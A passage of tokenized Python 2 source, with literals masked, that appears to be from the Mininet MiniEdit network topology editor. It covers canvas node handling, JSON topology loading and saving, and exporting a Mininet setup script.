tools [ <NUM_LIT:0> ] ) <EOL> Label ( toolbar , text = '<STR_LIT>' ) . pack ( ) <EOL> for cmd , color in [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] : <EOL> doCmd = getattr ( self , '<STR_LIT>' + cmd ) <EOL> b = Button ( toolbar , text = cmd , font = self . smallFont , <EOL> fg = color , command = doCmd ) <EOL> b . pack ( fill = '<STR_LIT:x>' , side = '<STR_LIT>' ) <EOL> return toolbar <EOL> def doRun ( self ) : <EOL> "<STR_LIT>" <EOL> self . activate ( '<STR_LIT>' ) <EOL> for tool in self . tools : <EOL> self . buttons [ tool ] . config ( state = '<STR_LIT>' ) <EOL> self . start ( ) <EOL> def doStop ( self ) : <EOL> "<STR_LIT>" <EOL> self . stop ( ) <EOL> for tool in self . 
tools : <EOL> self . buttons [ tool ] . config ( state = '<STR_LIT>' ) <EOL> def addNode ( self , node , nodeNum , x , y , name = None ) : <EOL> "<STR_LIT>" <EOL> if '<STR_LIT>' == node : <EOL> self . switchCount += <NUM_LIT:1> <EOL> if '<STR_LIT>' == node : <EOL> self . hostCount += <NUM_LIT:1> <EOL> if '<STR_LIT>' == node : <EOL> self . controllerCount += <NUM_LIT:1> <EOL> if name is None : <EOL> name = self . nodePrefixes [ node ] + nodeNum <EOL> self . addNamedNode ( node , name , x , y ) <EOL> def addNamedNode ( self , node , name , x , y ) : <EOL> "<STR_LIT>" <EOL> icon = self . nodeIcon ( node , name ) <EOL> item = self . canvas . create_window ( x , y , anchor = '<STR_LIT:c>' , window = icon , <EOL> tags = node ) <EOL> self . widgetToItem [ icon ] = item <EOL> self . itemToWidget [ item ] = icon <EOL> icon . links = { } <EOL> def convertJsonUnicode ( self , text ) : <EOL> "<STR_LIT>" <EOL> if isinstance ( text , dict ) : <EOL> return { self . convertJsonUnicode ( key ) : self . convertJsonUnicode ( value ) for key , value in text . iteritems ( ) } <EOL> elif isinstance ( text , list ) : <EOL> return [ self . convertJsonUnicode ( element ) for element in text ] <EOL> elif isinstance ( text , unicode ) : <EOL> return text . encode ( '<STR_LIT:utf-8>' ) <EOL> else : <EOL> return text <EOL> def loadTopology ( self ) : <EOL> "<STR_LIT>" <EOL> c = self . canvas <EOL> myFormats = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:*>' ) , <EOL> ] <EOL> f = tkFileDialog . askopenfile ( filetypes = myFormats , mode = '<STR_LIT:rb>' ) <EOL> if f == None : <EOL> return <EOL> self . newTopology ( ) <EOL> loadedTopology = self . convertJsonUnicode ( json . load ( f ) ) <EOL> if '<STR_LIT>' in loadedTopology : <EOL> self . appPrefs = dict ( self . appPrefs . items ( ) + loadedTopology [ '<STR_LIT>' ] . items ( ) ) <EOL> if "<STR_LIT>" not in self . appPrefs [ "<STR_LIT>" ] : <EOL> self . 
appPrefs [ "<STR_LIT>" ] [ "<STR_LIT>" ] = '<STR_LIT:0>' <EOL> if "<STR_LIT>" not in self . appPrefs [ "<STR_LIT>" ] : <EOL> self . appPrefs [ "<STR_LIT>" ] [ "<STR_LIT>" ] = '<STR_LIT:0>' <EOL> if "<STR_LIT>" not in self . appPrefs [ "<STR_LIT>" ] : <EOL> self . appPrefs [ "<STR_LIT>" ] [ "<STR_LIT>" ] = '<STR_LIT:0>' <EOL> if "<STR_LIT>" not in self . appPrefs [ "<STR_LIT>" ] : <EOL> self . appPrefs [ "<STR_LIT>" ] [ "<STR_LIT>" ] = '<STR_LIT:0>' <EOL> if "<STR_LIT>" not in self . appPrefs : <EOL> self . appPrefs [ "<STR_LIT>" ] = self . sflowDefaults <EOL> if "<STR_LIT>" not in self . appPrefs : <EOL> self . appPrefs [ "<STR_LIT>" ] = self . nflowDefaults <EOL> if '<STR_LIT>' in loadedTopology : <EOL> if loadedTopology [ '<STR_LIT:version>' ] == '<STR_LIT:1>' : <EOL> hostname = '<STR_LIT>' <EOL> self . controllers = { } <EOL> self . controllers [ hostname ] = loadedTopology [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . controllers [ hostname ] [ '<STR_LIT>' ] = hostname <EOL> self . addNode ( '<STR_LIT>' , <NUM_LIT:0> , float ( <NUM_LIT:30> ) , float ( <NUM_LIT:30> ) , name = hostname ) <EOL> icon = self . findWidgetByName ( hostname ) <EOL> icon . bind ( '<STR_LIT>' , self . do_controllerPopup ) <EOL> else : <EOL> controllers = loadedTopology [ '<STR_LIT>' ] <EOL> for controller in controllers : <EOL> hostname = controller [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> x = controller [ '<STR_LIT:x>' ] <EOL> y = controller [ '<STR_LIT:y>' ] <EOL> self . addNode ( '<STR_LIT>' , <NUM_LIT:0> , float ( x ) , float ( y ) , name = hostname ) <EOL> self . controllers [ hostname ] = controller [ '<STR_LIT>' ] <EOL> icon = self . findWidgetByName ( hostname ) <EOL> icon . bind ( '<STR_LIT>' , self . 
do_controllerPopup ) <EOL> hosts = loadedTopology [ '<STR_LIT>' ] <EOL> for host in hosts : <EOL> nodeNum = host [ '<STR_LIT>' ] <EOL> hostname = '<STR_LIT:h>' + nodeNum <EOL> if '<STR_LIT>' in host [ '<STR_LIT>' ] : <EOL> hostname = host [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> else : <EOL> host [ '<STR_LIT>' ] [ '<STR_LIT>' ] = hostname <EOL> if '<STR_LIT>' not in host [ '<STR_LIT>' ] : <EOL> host [ '<STR_LIT>' ] [ '<STR_LIT>' ] = int ( nodeNum ) <EOL> x = host [ '<STR_LIT:x>' ] <EOL> y = host [ '<STR_LIT:y>' ] <EOL> self . addNode ( '<STR_LIT>' , nodeNum , float ( x ) , float ( y ) , name = hostname ) <EOL> if '<STR_LIT>' in host [ '<STR_LIT>' ] : <EOL> newDirList = [ ] <EOL> for privateDir in host [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> if isinstance ( privateDir , list ) : <EOL> newDirList . append ( ( privateDir [ <NUM_LIT:0> ] , privateDir [ <NUM_LIT:1> ] ) ) <EOL> else : <EOL> newDirList . append ( privateDir ) <EOL> host [ '<STR_LIT>' ] [ '<STR_LIT>' ] = newDirList <EOL> self . hostOpts [ hostname ] = host [ '<STR_LIT>' ] <EOL> icon = self . findWidgetByName ( hostname ) <EOL> icon . bind ( '<STR_LIT>' , self . do_hostPopup ) <EOL> switches = loadedTopology [ '<STR_LIT>' ] <EOL> for switch in switches : <EOL> nodeNum = switch [ '<STR_LIT>' ] <EOL> hostname = '<STR_LIT:s>' + nodeNum <EOL> if '<STR_LIT>' not in switch [ '<STR_LIT>' ] : <EOL> switch [ '<STR_LIT>' ] [ '<STR_LIT>' ] = [ ] <EOL> if '<STR_LIT>' not in switch [ '<STR_LIT>' ] : <EOL> switch [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT:default>' <EOL> if '<STR_LIT>' in switch [ '<STR_LIT>' ] : <EOL> hostname = switch [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> else : <EOL> switch [ '<STR_LIT>' ] [ '<STR_LIT>' ] = hostname <EOL> if '<STR_LIT>' not in switch [ '<STR_LIT>' ] : <EOL> switch [ '<STR_LIT>' ] [ '<STR_LIT>' ] = int ( nodeNum ) <EOL> x = switch [ '<STR_LIT:x>' ] <EOL> y = switch [ '<STR_LIT:y>' ] <EOL> if switch [ '<STR_LIT>' ] [ '<STR_LIT>' ] == "<STR_LIT>" : <EOL> self . 
addNode ( '<STR_LIT>' , nodeNum , float ( x ) , float ( y ) , name = hostname ) <EOL> icon = self . findWidgetByName ( hostname ) <EOL> icon . bind ( '<STR_LIT>' , self . do_legacyRouterPopup ) <EOL> elif switch [ '<STR_LIT>' ] [ '<STR_LIT>' ] == "<STR_LIT>" : <EOL> self . addNode ( '<STR_LIT>' , nodeNum , float ( x ) , float ( y ) , name = hostname ) <EOL> icon = self . findWidgetByName ( hostname ) <EOL> icon . bind ( '<STR_LIT>' , self . do_legacySwitchPopup ) <EOL> else : <EOL> self . addNode ( '<STR_LIT>' , nodeNum , float ( x ) , float ( y ) , name = hostname ) <EOL> icon = self . findWidgetByName ( hostname ) <EOL> icon . bind ( '<STR_LIT>' , self . do_switchPopup ) <EOL> self . switchOpts [ hostname ] = switch [ '<STR_LIT>' ] <EOL> if int ( loadedTopology [ '<STR_LIT:version>' ] ) > <NUM_LIT:1> : <EOL> controllers = self . switchOpts [ hostname ] [ '<STR_LIT>' ] <EOL> for controller in controllers : <EOL> dest = self . findWidgetByName ( controller ) <EOL> dx , dy = self . canvas . coords ( self . widgetToItem [ dest ] ) <EOL> self . link = self . canvas . create_line ( float ( x ) , <EOL> float ( y ) , <EOL> dx , <EOL> dy , <EOL> width = <NUM_LIT:4> , <EOL> fill = '<STR_LIT>' , <EOL> dash = ( <NUM_LIT:6> , <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:4> ) , <EOL> tag = '<STR_LIT>' ) <EOL> c . itemconfig ( self . link , tags = c . gettags ( self . link ) + ( '<STR_LIT>' , ) ) <EOL> self . addLink ( icon , dest , linktype = '<STR_LIT>' ) <EOL> self . createControlLinkBindings ( ) <EOL> self . link = self . linkWidget = None <EOL> else : <EOL> dest = self . findWidgetByName ( '<STR_LIT>' ) <EOL> dx , dy = self . canvas . coords ( self . widgetToItem [ dest ] ) <EOL> self . link = self . canvas . create_line ( float ( x ) , <EOL> float ( y ) , <EOL> dx , <EOL> dy , <EOL> width = <NUM_LIT:4> , <EOL> fill = '<STR_LIT>' , <EOL> dash = ( <NUM_LIT:6> , <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:4> ) , <EOL> tag = '<STR_LIT>' ) <EOL> c . itemconfig ( self . link , tags = c . 
gettags ( self . link ) + ( '<STR_LIT>' , ) ) <EOL> self . addLink ( icon , dest , linktype = '<STR_LIT>' ) <EOL> self . createControlLinkBindings ( ) <EOL> self . link = self . linkWidget = None <EOL> links = loadedTopology [ '<STR_LIT>' ] <EOL> for link in links : <EOL> srcNode = link [ '<STR_LIT:src>' ] <EOL> src = self . findWidgetByName ( srcNode ) <EOL> sx , sy = self . canvas . coords ( self . widgetToItem [ src ] ) <EOL> destNode = link [ '<STR_LIT>' ] <EOL> dest = self . findWidgetByName ( destNode ) <EOL> dx , dy = self . canvas . coords ( self . widgetToItem [ dest ] ) <EOL> self . link = self . canvas . create_line ( sx , sy , dx , dy , width = <NUM_LIT:4> , <EOL> fill = '<STR_LIT>' , tag = '<STR_LIT>' ) <EOL> c . itemconfig ( self . link , tags = c . gettags ( self . link ) + ( '<STR_LIT:data>' , ) ) <EOL> self . addLink ( src , dest , linkopts = link [ '<STR_LIT>' ] ) <EOL> self . createDataLinkBindings ( ) <EOL> self . link = self . linkWidget = None <EOL> f . close ( ) <EOL> def findWidgetByName ( self , name ) : <EOL> for widget in self . widgetToItem : <EOL> if name == widget [ '<STR_LIT:text>' ] : <EOL> return widget <EOL> def newTopology ( self ) : <EOL> "<STR_LIT>" <EOL> for widget in self . widgetToItem . keys ( ) : <EOL> self . deleteItem ( self . widgetToItem [ widget ] ) <EOL> self . hostCount = <NUM_LIT:0> <EOL> self . switchCount = <NUM_LIT:0> <EOL> self . controllerCount = <NUM_LIT:0> <EOL> self . links = { } <EOL> self . hostOpts = { } <EOL> self . switchOpts = { } <EOL> self . controllers = { } <EOL> self . appPrefs [ "<STR_LIT>" ] = self . defaultIpBase <EOL> def saveTopology ( self ) : <EOL> "<STR_LIT>" <EOL> myFormats = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:*>' ) , <EOL> ] <EOL> savingDictionary = { } <EOL> fileName = tkFileDialog . 
asksaveasfilename ( filetypes = myFormats , title = "<STR_LIT>" ) <EOL> if len ( fileName ) > <NUM_LIT:0> : <EOL> savingDictionary [ '<STR_LIT:version>' ] = '<STR_LIT:2>' <EOL> hostsToSave = [ ] <EOL> switchesToSave = [ ] <EOL> controllersToSave = [ ] <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> x1 , y1 = self . canvas . coords ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags or '<STR_LIT>' in tags or '<STR_LIT>' in tags : <EOL> nodeNum = self . switchOpts [ name ] [ '<STR_LIT>' ] <EOL> nodeToSave = { '<STR_LIT>' : str ( nodeNum ) , <EOL> '<STR_LIT:x>' : str ( x1 ) , <EOL> '<STR_LIT:y>' : str ( y1 ) , <EOL> '<STR_LIT>' : self . switchOpts [ name ] } <EOL> switchesToSave . append ( nodeToSave ) <EOL> elif '<STR_LIT>' in tags : <EOL> nodeNum = self . hostOpts [ name ] [ '<STR_LIT>' ] <EOL> nodeToSave = { '<STR_LIT>' : str ( nodeNum ) , <EOL> '<STR_LIT:x>' : str ( x1 ) , <EOL> '<STR_LIT:y>' : str ( y1 ) , <EOL> '<STR_LIT>' : self . hostOpts [ name ] } <EOL> hostsToSave . append ( nodeToSave ) <EOL> elif '<STR_LIT>' in tags : <EOL> nodeToSave = { '<STR_LIT:x>' : str ( x1 ) , <EOL> '<STR_LIT:y>' : str ( y1 ) , <EOL> '<STR_LIT>' : self . controllers [ name ] } <EOL> controllersToSave . append ( nodeToSave ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" + name ) <EOL> savingDictionary [ '<STR_LIT>' ] = hostsToSave <EOL> savingDictionary [ '<STR_LIT>' ] = switchesToSave <EOL> savingDictionary [ '<STR_LIT>' ] = controllersToSave <EOL> linksToSave = [ ] <EOL> for link in self . links . 
values ( ) : <EOL> src = link [ '<STR_LIT:src>' ] <EOL> dst = link [ '<STR_LIT>' ] <EOL> linkopts = link [ '<STR_LIT>' ] <EOL> srcName , dstName = src [ '<STR_LIT:text>' ] , dst [ '<STR_LIT:text>' ] <EOL> linkToSave = { '<STR_LIT:src>' : srcName , <EOL> '<STR_LIT>' : dstName , <EOL> '<STR_LIT>' : linkopts } <EOL> if link [ '<STR_LIT:type>' ] == '<STR_LIT:data>' : <EOL> linksToSave . append ( linkToSave ) <EOL> savingDictionary [ '<STR_LIT>' ] = linksToSave <EOL> savingDictionary [ '<STR_LIT>' ] = self . appPrefs <EOL> try : <EOL> f = open ( fileName , '<STR_LIT:wb>' ) <EOL> f . write ( json . dumps ( savingDictionary , sort_keys = True , indent = <NUM_LIT:4> , separators = ( '<STR_LIT:U+002C>' , '<STR_LIT>' ) ) ) <EOL> except Exception as er : <EOL> print er <EOL> finally : <EOL> f . close ( ) <EOL> def exportScript ( self ) : <EOL> "<STR_LIT>" <EOL> myFormats = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:*>' ) , <EOL> ] <EOL> fileName = tkFileDialog . asksaveasfilename ( filetypes = myFormats , title = "<STR_LIT>" ) <EOL> if len ( fileName ) > <NUM_LIT:0> : <EOL> f = open ( fileName , '<STR_LIT:wb>' ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> if StrictVersion ( MININET_VERSION ) > StrictVersion ( '<STR_LIT>' ) : <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> inBandCtrl = False <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . controllers [ name ] <EOL> controllerType = opts [ '<STR_LIT>' ] <EOL> if controllerType == '<STR_LIT>' : <EOL> inBandCtrl = True <EOL> if inBandCtrl == True : <EOL> f . 
write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> if len ( self . appPrefs [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> f . write ( "<STR_LIT>" + self . appPrefs [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" + self . appPrefs [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . controllers [ name ] <EOL> controllerType = opts [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in opts : <EOL> controllerProtocol = opts [ '<STR_LIT>' ] <EOL> else : <EOL> controllerProtocol = '<STR_LIT>' <EOL> controllerIP = opts [ '<STR_LIT>' ] <EOL> controllerPort = opts [ '<STR_LIT>' ] <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + name + "<STR_LIT>" ) <EOL> if controllerType == '<STR_LIT>' : <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" + controllerIP + "<STR_LIT>" ) <EOL> elif controllerType == '<STR_LIT>' : <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" + controllerIP + "<STR_LIT>" ) <EOL> elif controllerType == '<STR_LIT>' : <EOL> f . write ( "<STR_LIT>" ) <EOL> else : <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" + controllerProtocol + "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" + str ( controllerPort ) + "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . 
widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + name + "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" ) <EOL> if '<STR_LIT>' in tags : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + name + "<STR_LIT>" ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . switchOpts [ name ] <EOL> nodeNum = opts [ '<STR_LIT>' ] <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + name + "<STR_LIT:'>" ) <EOL> if opts [ '<STR_LIT>' ] == '<STR_LIT:default>' : <EOL> if self . appPrefs [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> f . write ( "<STR_LIT>" ) <EOL> elif self . appPrefs [ '<STR_LIT>' ] == '<STR_LIT:user>' : <EOL> f . write ( "<STR_LIT>" ) <EOL> elif self . appPrefs [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> f . write ( "<STR_LIT>" ) <EOL> else : <EOL> f . write ( "<STR_LIT>" ) <EOL> elif opts [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> f . write ( "<STR_LIT>" ) <EOL> elif opts [ '<STR_LIT>' ] == '<STR_LIT:user>' : <EOL> f . write ( "<STR_LIT>" ) <EOL> elif opts [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> f . write ( "<STR_LIT>" ) <EOL> else : <EOL> f . write ( "<STR_LIT>" ) <EOL> if '<STR_LIT>' in opts : <EOL> f . write ( "<STR_LIT>" + opts [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in opts : <EOL> f . write ( "<STR_LIT>" + opts [ '<STR_LIT>' ] + "<STR_LIT:'>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> if '<STR_LIT>' in opts : <EOL> for extInterface in opts [ '<STR_LIT>' ] : <EOL> f . write ( "<STR_LIT>" + extInterface + "<STR_LIT>" + name + "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . 
hostOpts [ name ] <EOL> ip = None <EOL> defaultRoute = None <EOL> if '<STR_LIT>' in opts and len ( opts [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> defaultRoute = "<STR_LIT>" + opts [ '<STR_LIT>' ] + "<STR_LIT:'>" <EOL> else : <EOL> defaultRoute = '<STR_LIT:None>' <EOL> if '<STR_LIT>' in opts and len ( opts [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> ip = opts [ '<STR_LIT>' ] <EOL> else : <EOL> nodeNum = self . hostOpts [ name ] [ '<STR_LIT>' ] <EOL> ipBaseNum , prefixLen = netParse ( self . appPrefs [ '<STR_LIT>' ] ) <EOL> ip = ipAdd ( i = nodeNum , prefixLen = prefixLen , ipBaseNum = ipBaseNum ) <EOL> if '<STR_LIT>' in opts or '<STR_LIT>' in opts : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + name + "<STR_LIT>" + ip + "<STR_LIT>" + defaultRoute + "<STR_LIT>" ) <EOL> if '<STR_LIT>' in opts : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + opts [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> if '<STR_LIT>' in opts : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + str ( opts [ '<STR_LIT>' ] ) + "<STR_LIT>" + opts [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> else : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + name + "<STR_LIT>" + ip + "<STR_LIT>" + defaultRoute + "<STR_LIT>" ) <EOL> if '<STR_LIT>' in opts : <EOL> for extInterface in opts [ '<STR_LIT>' ] : <EOL> f . write ( "<STR_LIT>" + extInterface + "<STR_LIT>" + name + "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> for key , linkDetail in self . links . iteritems ( ) : <EOL> tags = self . canvas . 
gettags ( key ) <EOL> if '<STR_LIT:data>' in tags : <EOL> optsExist = False <EOL> src = linkDetail [ '<STR_LIT:src>' ] <EOL> dst = linkDetail [ '<STR_LIT>' ] <EOL> linkopts = linkDetail [ '<STR_LIT>' ] <EOL> srcName , dstName = src [ '<STR_LIT:text>' ] , dst [ '<STR_LIT:text>' ] <EOL> bw = '<STR_LIT>' <EOL> linkOpts = "<STR_LIT:{>" <EOL> if '<STR_LIT>' in linkopts : <EOL> bw = linkopts [ '<STR_LIT>' ] <EOL> linkOpts = linkOpts + "<STR_LIT>" + str ( bw ) <EOL> optsExist = True <EOL> if '<STR_LIT>' in linkopts : <EOL> if optsExist : <EOL> linkOpts = linkOpts + "<STR_LIT:U+002C>" <EOL> linkOpts = linkOpts + "<STR_LIT>" + linkopts [ '<STR_LIT>' ] + "<STR_LIT:'>" <EOL> optsExist = True <EOL> if '<STR_LIT>' in linkopts : <EOL> if optsExist : <EOL> linkOpts = linkOpts + "<STR_LIT:U+002C>" <EOL> linkOpts = linkOpts + "<STR_LIT>" + str ( linkopts [ '<STR_LIT>' ] ) <EOL> optsExist = True <EOL> if '<STR_LIT>' in linkopts : <EOL> if optsExist : <EOL> linkOpts = linkOpts + "<STR_LIT:U+002C>" <EOL> linkOpts = linkOpts + "<STR_LIT>" + str ( linkopts [ '<STR_LIT>' ] ) <EOL> optsExist = True <EOL> if '<STR_LIT>' in linkopts : <EOL> if optsExist : <EOL> linkOpts = linkOpts + "<STR_LIT:U+002C>" <EOL> linkOpts = linkOpts + "<STR_LIT>" + linkopts [ '<STR_LIT>' ] + "<STR_LIT:'>" <EOL> optsExist = True <EOL> if '<STR_LIT>' in linkopts : <EOL> if optsExist : <EOL> linkOpts = linkOpts + "<STR_LIT:U+002C>" <EOL> linkOpts = linkOpts + "<STR_LIT>" + str ( linkopts [ '<STR_LIT>' ] ) <EOL> optsExist = True <EOL> linkOpts = linkOpts + "<STR_LIT:}>" <EOL> if optsExist : <EOL> f . write ( "<STR_LIT:U+0020>" + srcName + dstName + "<STR_LIT>" + linkOpts + "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" + srcName + "<STR_LIT:U+002CU+0020>" + dstName ) <EOL> if optsExist : <EOL> f . write ( "<STR_LIT>" + srcName + dstName ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . 
write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags or '<STR_LIT>' in tags : <EOL> opts = self . switchOpts [ name ] <EOL> ctrlList = "<STR_LIT:U+002C>" . join ( opts [ '<STR_LIT>' ] ) <EOL> f . write ( "<STR_LIT>" + name + "<STR_LIT>" + ctrlList + "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . switchOpts [ name ] <EOL> if opts [ '<STR_LIT>' ] == '<STR_LIT:default>' : <EOL> if self . appPrefs [ '<STR_LIT>' ] == '<STR_LIT:user>' : <EOL> if '<STR_LIT>' in opts : <EOL> if len ( opts [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + name + "<STR_LIT:U+0020>" + opts [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> elif self . appPrefs [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> if '<STR_LIT>' in opts : <EOL> if len ( opts [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + opts [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> elif self . appPrefs [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> if '<STR_LIT>' in opts : <EOL> if len ( opts [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + name + "<STR_LIT:U+0020>" + opts [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> elif opts [ '<STR_LIT>' ] == '<STR_LIT:user>' : <EOL> if '<STR_LIT>' in opts : <EOL> if len ( opts [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> f . 
write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + name + "<STR_LIT:U+0020>" + opts [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> elif opts [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> if '<STR_LIT>' in opts : <EOL> if len ( opts [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + opts [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> elif opts [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> if '<STR_LIT>' in opts : <EOL> if len ( opts [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + name + "<STR_LIT:U+0020>" + opts [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . hostOpts [ name ] <EOL> if '<STR_LIT>' in opts : <EOL> for vlanInterface in opts [ '<STR_LIT>' ] : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + name + "<STR_LIT>" + vlanInterface [ <NUM_LIT:1> ] + "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + name + "<STR_LIT>" + vlanInterface [ <NUM_LIT:1> ] + "<STR_LIT:U+0020>" + vlanInterface [ <NUM_LIT:0> ] + "<STR_LIT>" ) <EOL> if '<STR_LIT>' in opts : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + opts [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . switchOpts [ name ] <EOL> if '<STR_LIT>' in opts : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + opts [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> nflowValues = 